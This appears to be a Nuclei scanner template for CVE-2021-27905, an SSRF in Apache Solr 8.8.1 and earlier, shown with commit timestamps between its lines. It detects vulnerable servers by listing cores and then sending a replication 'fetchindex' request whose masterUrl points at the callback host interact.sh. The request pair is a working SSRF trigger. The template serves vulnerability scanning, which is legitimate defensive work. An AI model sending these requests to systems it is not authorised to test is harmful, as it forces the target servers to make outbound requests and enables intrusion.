2021-04-23 08:44:49 +00:00
id : CVE-2021-27905
info :
2022-05-18 20:58:07 +00:00
name : Apache Solr <=8.8.1 - Server-Side Request Forgery
2021-04-23 10:08:41 +00:00
author : hackergautam
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-18 20:58:07 +00:00
description : Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
2023-09-06 12:09:01 +00:00
remediation : This issue is resolved in Apache Solr 8.8.2 and later.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.anquanke.com/post/id/238201
- https://ubuntu.com/security/CVE-2021-27905
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
2023-07-11 19:49:27 +00:00
- https://lists.apache.org/thread.html/r0ddc3a82bd7523b1453cb7a5e09eb5559517145425074a42eb326b10%40%3Cannounce.apache.org%3E
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-27905
cwe-id : CWE-918
2023-11-09 06:04:52 +00:00
epss-score : 0.94052
2023-11-10 09:15:01 +00:00
epss-percentile : 0.98932
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : apache
product : solr
tags : cve,cve2021,apache,solr,ssrf
2021-04-23 08:44:49 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-23 08:44:49 +00:00
- raw :
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host : {{Hostname}}
Accept-Language : en
Connection : close
- |
2022-06-06 10:40:15 +00:00
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
2021-04-23 08:44:49 +00:00
Host : {{Hostname}}
Accept-Language : en
Connection : close
2023-07-11 19:49:27 +00:00
matchers :
- type : word
part : body
words :
- '<str name="status">OK</str>'
2021-04-23 08:44:49 +00:00
extractors :
- type : regex
2021-04-23 10:08:41 +00:00
name : core
2021-04-23 08:44:49 +00:00
group : 1
2021-08-09 16:28:28 +00:00
regex :
- '"name"\:"(.*?)"'
2023-07-11 19:49:27 +00:00
internal : true
2023-11-10 17:07:52 +00:00
# digest: 4a0a00473045022022b1a64ee545723137a57978c9146018db67377ae631d36e1970355cf25cbd33022100d42a03006a848ec00d44df372035e5e873f4bf35b20bff373aaaa820806e4e96:922c64590222798bb761d5b6d8e72950